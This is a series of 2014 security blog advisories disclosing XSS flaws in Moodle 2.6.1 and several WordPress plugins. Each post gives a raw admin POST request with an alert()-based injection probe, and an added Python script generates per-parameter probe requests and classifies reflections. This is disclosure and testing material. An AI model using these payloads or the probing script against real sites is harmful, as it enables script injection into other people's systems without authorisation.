Thursday, 27 February 2014

[EN] Moodle 2.6.1 XSS

During my last tests I found that the latest version of Moodle is vulnerable to XSS.

Check it out:

# ==============================================================
# Title ...| Moodle 2.6.1 XSS
# Version .| (Feb 27  2014) moodle-latest-26.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://download.moodle.org
# ==============================================================

[+] From admin user:

# ==============================================================
# 1. Persistent XSS

---<request>---
POST /k/cms/moodle/course/edit.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 988

returnto=topcat&mform_isexpanded_id_descriptionhdr=1&addcourseformatoptionshere=&enablecompletion=0&id=&sesskey=TCxmENhHwt&_qf__course_edit_form=1&mform_isexpanded_id_general=1&mform_isexpanded_id_courseformathdr=0&mform_isexpanded_id_appearancehdr=0&mform_isexpanded_id_filehdr=0&mform_isexpanded_id_enrol_guest_header_0=0&mform_isexpanded_id_groups=0&mform_isexpanded_id_rolerenaming=0&fullname=startowy&shortname=startowy&category=1&visible=1&startdate%5Bday%5D=28&startdate%5Bmonth%5D=2&startdate%5Byear%5D=2014&idnumber=&summary_editor%5Btext%5D=%3Cp%3Estartowy%3C%2Fp%3E&summary_editor%5Bformat%5D=1&summary_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&overviewfiles_filemanager=41075595&format=weeks&numsections=10&hiddensections=0&coursedisplay=0&lang=&newsitems=5&showgrades=1&showreports=0&maxbytes=0&enrol_guest_status_0=1&groupmode=0&groupmodeforce=0&defaultgroupingid=0&role_1=&role_2=&role_3=&role_4=&role_5=&role_6=&role_7=&role_8=&submitbutton=Save+changes
---<request>---


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/moodle/group/group.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 361

id=&courseid=5&sesskey=cik7wECmff&_qf__group_form=1&mform_isexpanded_id_general=1&name=aaaaaaaaaaaaaa&idnumber=&description_editor%5Btext%5D=%3Cp%3Eaaaaaaaaaaaaaaaaaaaaaaa%3C%2Fp%3E&description_editor%5Bformat%5D=1&description_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&enrolmentkey=&hidepicture=0&imagefile=801633198&submitbutton=Save+changes
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Wednesday, 26 February 2014

[EN] Multiple XSS in mp3-jplayer

# ==============================================================
# Title ...| Multiple XSS in mp3-jplayer
# Version .| mp3-jplayer.1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# Multiple XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=mp3jplayer.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1441

mp3foxVol=100&make_player_from_link=true&mp3foxOnBlog=true&mp3foxTheme=styleF&mp3foxCustomStylesheet='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&mp3foxScreenOpac=&mp3foxScreenColour=&mp3foxLoadbarOpac=&mp3foxLoadbarColour=&mp3foxPosbarOpac=&mp3foxPosbarColour=&mp3foxPosbarTint=&mp3foxPlaylistOpac=&mp3foxPlaylistColour=&mp3foxPlaylistTint=&mp3foxIndicator=&mp3foxVolGrad=&mp3foxListDivider=&mp3foxScreenTextColour=&mp3foxListTextColour=&mp3foxListCurrentColour=&mp3foxListBGaCurrent=&mp3foxListHoverColour=&mp3foxListBGaHover=&mp3foxPopoutBackground=&mp3foxPopoutBGimage=&librarySortcol=file&libraryDirection=ASC&mp3foxfolder=%2F&mp3foxPlayerWidth=40%25&mp3foxFloat=none&mp3foxDownloadMp3=false&loggedout_dload_text=LOG+IN+TO+DOWNLOAD&loggedout_dload_link=http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-login.php&dload_text=DOWNLOAD+MP3&force_browser_dload=true&dloader_remote_path=&mp3foxPaddings_top=5px&mp3foxPaddings_inner=35px&mp3foxPaddings_bottom=40px&mp3foxMaxListHeight=450&mp3foxShowPlaylist=true&file_separator=%2C&caption_separator=%3B&mp3foxEnablePopout=true&mp3foxPopoutWidth=400&mp3foxPopoutMaxHeight=600&mp3foxPopoutButtonText=&mp3foxEncodeFiles=true&mp3foxAllowRemote=true&make_player_from_link_shcode=%5Bmp3j+track%3D%22%7BTEXT%7D%40%7BURL%7D%22+volslider%3D%22y%22+style%3D%22outline%22%5D&touch_punch_js=true&disableJSlibs=&update_mp3foxSettings=Update+Settings&mp3foxRemember=true&MtogBox1=false&mp3foxPluginVersion=1.8.7
---<request>---

Also vulnerable:
mp3foxScreenOpac, mp3foxScreenColour, mp3foxLoadbarOpac, mp3foxLoadbarColour, mp3foxPosbarOpac, mp3foxPosbarColour,
mp3foxPlaylistOpac, mp3foxPlaylistColour, mp3foxScreenTextColour, mp3foxListTextColour, mp3foxListCurrentColour, mp3foxListBGaCurrent, mp3foxListHoverColour, mp3foxListBGaHover, mp3foxPopoutBackground,
mp3foxPopoutBGimage, mp3foxPlayerWidth, loggedout_dload_text, loggedout_dload_link, dload_text,
dloader_remote_path, mp3foxPaddings_top, mp3foxPaddings_inner, mp3foxPaddings_bottom, file_separator, caption_separator, mp3foxPopoutButtonText, make_player_from_link_shcode, MtogBox1
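Every request in these advisories changes one form field at a time, sends the probe `'>"><body/onload=alert(9999)>` in it, and keeps the CSRF token (`_wpnonce` in the WordPress forms, `sesskey` in the Moodle ones) and the routing fields as captured; a list like the one above is what you get after repeating that for every field in the form. The script below, an added example and not the blog author's tooling, automates that loop offline: it turns a captured POST body into one probe body per parameter and classifies a response as a raw reflection, an entity-escaped reflection, or no reflection. The constructed request body reuses parameter names from the mp3-jplayer request above with shortened values; the two HTML responses are made-up stand-ins for a vulnerable and a fixed settings page, not captures from the plugin. Sending the bodies is left to the caller, because the targets here all need an authenticated admin session.

```python
"""
Added example (not from the HauntIT blog or the plugins it tests): the
one-parameter-at-a-time XSS probe used in these advisories as a reusable
generator, plus a classifier for what the server echoes back.  Runs offline
on a constructed request body and constructed responses.
"""
import html
from urllib.parse import parse_qsl, urlencode

# The probe string the advisories inject: it closes a single- or double-quoted
# attribute value, closes the enclosing tag, then starts a new element whose
# onload handler fires.  The "/" between "body" and "onload" is a valid
# attribute separator in HTML, useful where spaces get filtered.
PROBE = "'>\"><body/onload=alert(9999)>"

# Fields that must keep their captured value or the server rejects/ignores the
# request before anything is reflected: CSRF tokens (WordPress _wpnonce,
# Moodle sesskey), option-group / action routing fields and the submit button.
# Assumption: the caller extends this with app-specific names (see demo()).
DEFAULT_KEEP = frozenset({
    "_wpnonce", "_wp_http_referer", "option_page", "action",
    "sesskey", "submitbutton", "submit",
})


def probe_bodies(captured_body, probe=PROBE, keep=DEFAULT_KEEP):
    """Yield (parameter_name, request_body) pairs.

    Each body is the captured, URL-encoded POST body with exactly one
    parameter replaced by the probe and every other parameter left as it
    was captured.  One field per request is what lets a tester attribute a
    reflection to a single parameter, i.e. build an "Also vulnerable:" list.
    """
    pairs = parse_qsl(captured_body, keep_blank_values=True)
    for i, (name, _value) in enumerate(pairs):
        if name in keep:
            continue
        mutated = pairs[:i] + [(name, probe)] + pairs[i + 1:]
        yield name, urlencode(mutated)


def classify_reflection(response_html, probe=PROBE):
    """Return 'raw', 'escaped' or 'absent' for one response.

    'raw'     - the injected tag is present verbatim: the break-out works.
                Backslash-escaped quotes (addslashes) still count as raw,
                because a backslash does not escape a quote in HTML.
    'escaped' - only an entity-encoded copy is present (PHP htmlspecialchars,
                WordPress esc_attr(), Moodle s(), Python html.escape): safe.
    'absent'  - the parameter was not echoed into this page.  For a stored
                value (the Moodle course and group editors) the check has to
                be repeated on the page that later displays the value.
    """
    tag = probe[probe.index("<"):]        # "<body/onload=alert(9999)>"
    if tag in response_html:
        return "raw"
    inner = tag[1:-1]                     # "body/onload=alert(9999)"
    if "&lt;" + inner + "&gt;" in response_html:
        return "escaped"
    return "absent"


def reflection_context(response_html, probe=PROBE, width=40):
    """The text right before a raw reflection, so the tester can see which
    context the value landed in (attribute value, text node, script block)
    and pick a payload that fits it.  None when the reflection is not raw."""
    tag = probe[probe.index("<"):]
    pos = response_html.find(tag)
    if pos < 0:
        return None
    return response_html[max(0, pos - width):pos]


def demo():
    # Constructed request body: field names from the mp3-jplayer settings
    # form above, values shortened.  The plugin's own submit and version
    # fields are added to the keep set so they are never overwritten.
    captured = ("mp3foxVol=100&mp3foxTheme=styleF&mp3foxCustomStylesheet="
                "&mp3foxPlayerWidth=40%25&update_mp3foxSettings=Update+Settings"
                "&mp3foxPluginVersion=1.8.7")
    keep = DEFAULT_KEEP | {"update_mp3foxSettings", "mp3foxPluginVersion"}
    bodies = dict(probe_bodies(captured, keep=keep))

    # Constructed responses standing in for a vulnerable and a fixed page.
    vulnerable = ('<input type="text" name="mp3foxCustomStylesheet" '
                  'value="' + PROBE + '">')
    fixed = ('<input type="text" name="mp3foxCustomStylesheet" '
             'value="' + html.escape(PROBE, quote=True) + '">')
    return {
        "bodies": bodies,
        "vulnerable": classify_reflection(vulnerable),
        "fixed": classify_reflection(fixed),
        "context": reflection_context(vulnerable),
    }


if __name__ == "__main__":
    result = demo()
    for name, body in result["bodies"].items():
        print("probe ->", name, ":", body)
    print("vulnerable page:", result["vulnerable"], "| context:", result["context"])
    print("fixed page:", result["fixed"])
```

The "escaped" class is what `esc_attr()` in WordPress and `s()` in Moodle produce for the tag part of the probe (`&lt;body/onload=alert(9999)&gt;`), so a parameter that classifies as "escaped" after the fix is the expected outcome of adding output encoding at the sink; "absent" on the settings page does not clear a field that is stored and rendered somewhere else.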


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in PrintFriendly

# ==============================================================
# Title ...| XSS in PrintFriendly
# Version .| printfriendly 3.3.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1389

option_page=printfriendly_option&action=update&_wpnonce=496ce7c4d4&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dprintfriendly&printfriendly_option%5Bbutton_type%5D=pf-button.gif&printfriendly_option%5Bcustom_image%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&printfriendly_option%5Bcustom_text%5D=Print+Friendly&printfriendly_option%5Btext_color%5D=%236D9F00&printfriendly_option%5Btext_size%5D=14&printfriendly_option%5Bcontent_position%5D=left&printfriendly_option%5Bcontent_placement%5D=after&printfriendly_option%5Bmargin_left%5D=12&printfriendly_option%5Bmargin_right%5D=12&printfriendly_option%5Bmargin_top%5D=12&printfriendly_option%5Bmargin_bottom%5D=12&printfriendly_option%5Bshow_on_posts%5D=on&printfriendly_option%5Bshow_on_pages%5D=on&printfriendly_option%5Blogo%5D=favicon&printfriendly_option%5Bimage_url%5D=&printfriendly_option%5Btagline%5D=&printfriendly_option%5Bclick_to_delete%5D=0&printfriendly_option%5Bhide-images%5D=0&printfriendly_option%5Bimage-style%5D=right&printfriendly_option%5Bemail%5D=0&printfriendly_option%5Bpdf%5D=0&printfriendly_option%5Bprint%5D=0&printfriendly_option%5Bcustom_css_url%5D=&printfriendly_option%5Bwebsite_protocol%5D=http&printfriendly_option%5Bpassword_protected%5D=no&printfriendly_option%5Bjavascript%5D%3E=yes&printfriendly_option%5Benable_google_analytics%5D=no&printfriendly_option%5Bpf_algo%5D=wp
---<request>---

Also vulnerable: printfriendly_option%5Bcustom_text%5D



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in Alpine PhotoTile for Instagram

# ==============================================================
# Title ...| XSS in Alpine PhotoTile for Instagram
# Version .| Alpine PhotoTile for Instagram 1.2.6.5
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=plugin-settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 300

hidden=Y&general_highlight_color=%2364a2d8&general_lightbox=alpine-fancybox&general_lightbox_params='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&general_block_users=&hidden_widget_alignment=1&cache_time=4&alpine-photo-tile-for-instagram-settings_plugin-settings%5Bsubmit-plugin-settings%5D=Save+Settings
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in Widget Control Powered By Everyblock

# ==============================================================
# Title ...| XSS in Widget Control Powered By Everyblock
# Version .| widget-control-powered-by-everyblock.1.0.1
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/admin.php?page=add-widget-slug HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 52

idDropdown='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e
---<request>---

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in BSK PDF Manager

# ==============================================================
# Title ...| XSS in BSK PDF Manager
# Version .| bsk-pdf-manager 1.3
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/admin.php?page=bsk-pdf-manager&view=addnew HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 302

page=bsk-pdf-manager&view='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&cat_title=asdasd&bsk_pdf_manager_action=category_save&bsk_pdf_manager_category_id=-1&bsk_pdf_manager_category_save_oper_nonce=9977a95481&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dbsk-pdf-manager%26view%3Daddnew
---<request>---

Also vulnerable is 'category->title'.

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in VideoWhisper Live Streaming

# ==============================================================
# Title ...| XSS in VideoWhisper Live Streaming
# Version .| 4.29.6
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=premium HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 310

premiumList='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&canWatchPremium=all&watchListPremium=Super+Admin%2C+Administrator%2C+Editor%2C+Author%2C+Contributor%2C+Subscriber&pLogo=1&transcoding=1&alwaysRTMP=0&pBroadcastTime=0&pWatchTime=0&timeReset=30&pCamBandwidth=65536&pCamMaxBandwidth=163840&submit=Save+Changes
---<request>---

Also vulnerable: watchListPremium, pBroadcastTime, timeReset, pCamBandwidth


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in WP Post to PDF

# ==============================================================
# Title ...| XSS in WP Post to PDF
# Version .| wp-post-to-pdf.2.3.1
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 827

option_page=wpptopdf_options&action=update&_wpnonce=578db9a23d&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-post-to-pdf%2Fwp-post-to-pdf.php&wpptopdf%5Bpost%5D=1&wpptopdf%5Bpage%5D=1&wpptopdf%5Binclude%5D=0&wpptopdf%5BexcludeThis%5D=&wpptopdf%5BincludeCache%5D=0&wpptopdf%5BexcludeThisCache%5D=&wpptopdf%5BiconPosition%5D=before&wpptopdf%5BimageIcon%5D=%3Cimg+alt%3D%22Download+PDF%22+src%3D%22http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-content%2Fplugins%2Fwp-post-to-pdf%2Fasset%2Fimages%2Fpdf.png%22%3E&wpptopdf%5BheaderFont%5D=helvetica&wpptopdf%5BheaderFontSize%5D=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&wpptopdf%5BfooterFont%5D=helvetica&wpptopdf%5BfooterFontSize%5D=10&wpptopdf%5BcontentFont%5D=helvetica&wpptopdf%5BcontentFontSize%5D=12&wpptopdf%5Bsubmit%5D=Save+Changes
---<request>---

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Tuesday, 25 February 2014

[EN] Wordpress plugin Zedity vulnerable to XSS

# ==============================================================
# Title ...| Zedity XSS
# Version .| zedity.2.4.0
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---

POST /k/wordpress/wp-admin/admin-ajax.php?action=zedity_ajax HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

zaction=<body onload=alert(123)>&id=&post_id=28&title=aaaaaaa&content=%3Cdiv+data-origh%3D%22600%22+data-origw%3D%22600%22+style%3D%22position%3A+relative%3B+width%3A+600px%3B+height%3A+600px%3B+overflow%3A+hidden%3B%22+class%3D%22zedity-editor+zedity-notheme%22+id%3D%22zed_olgrv8%22%3E%3Cdiv+class%3D%22zedity-watermark%22+style%3D%22display%3Anone%3Btop%3A0%3Bleft%3A0%3B%22+data-pos%3D%22none%22%3E%3Cspan+style%3D%22color%3A%23ffd6ba%3Bfont-size%3A11px%3Bfont-family%3ATahoma%2CArial%2Csans-serif%22%3EPowered+by+%3Ca+href%3D%22http%3A%2F%2Fzedity.com%22+target%3D%22_blank%22+style%3D%22font-size%3A11px%3Bfont-weight%3Abold%3Bcolor%3Awhite%3Bfont-family%3AVerdana%2CTahoma%3Btext-decoration%3Anone%3B%22%3EZedity%3C%2Fa%3E%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fdiv%3E

---<request>---

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] Wordpress plugin EasyMedia Gallery vulnerable to XSS

# ==============================================================
# Title ...| EasyMedia Gallery XSS
# Version .| easy-media-gallery.1.2.29
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# EasyMedia Gallery XSS

---<request>---

POST /k/wordpress/wp-admin/edit.php?post_type=easymediagallery&page=emg_settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1452

option_page=easy_options_group&action=update&_wpnonce=e4392a9119&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Deasymediagallery%26page%3Demg_settings&easymedia_columns=3&easymedia_alignstyle=Center&easymedia_img_size_limit='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&easymedia_vid_size%5Bwidth%5D=700&easymedia_vid_size%5Bheight%5D=400&easymedia_disen_autoplv=1&easymedia_disen_autopl=1&easymedia_disen_audio_loop=1&easymedia_audio_vol=100&easymedia_box_style=Light&easymedia_cur_style=Pointer&easymedia_mag_icon=Icon-0&easymedia_frm_size%5Bwidth%5D=160&easymedia_frm_size%5Bheight%5D=160&easymedia_frm_col=%23FFFFFF&easymedia_ttl_col=%23C7C7C7&easymedia_brdr_rds=3&easymedia_thumb_col=%23000000&easymedia_hover_opcty=40&easymedia_style_pattern=pattern-01.png&easymedia_disen_bor=1&easymedia_disen_hovstyle=1&save3=Save+Changes&easymedia_disen_plug=1&easymedia_disen_rclick=1&easymedia_disen_databk=1&easymedia_disen_admnotify=1&easymedia_disen_dasnews=1&easymedia_ajax_con_id=%23content&easymedia_plugin_core=core-1.4.5-min&easymedia_plugin_wpinfo=-+WP+Version+%3A+3.8.1%0D%0A-+EMG-Lite+Version+%3A+1.2.29%0D%0A-+Site+URL+%3A+http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%0D%0A-+WP+Multisite+%3A+NO%0D%0A-+PHP+Direct+Access+%3A+YES%0D%0A-+Memory+Limit+%3A+128+MB%0D%0A-+Active+Theme+%3A+Twenty+Fourteen%0D%0A-+Active+Plugins+%3A+%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Easy+Media+Gallery%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Zedity%0D%0A&action=save

---<request>---


Also vulnerable are: easymedia_vid_size%5Bwidth%5D, easymedia_vid_size%5Bheight%5D,
easymedia_frm_size%5Bwidth%5D, easymedia_ttl_col, easymedia_thumb_col,
easymedia_hover_opcty, easymedia_style_pattern, easymedia_ajax_con_id


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/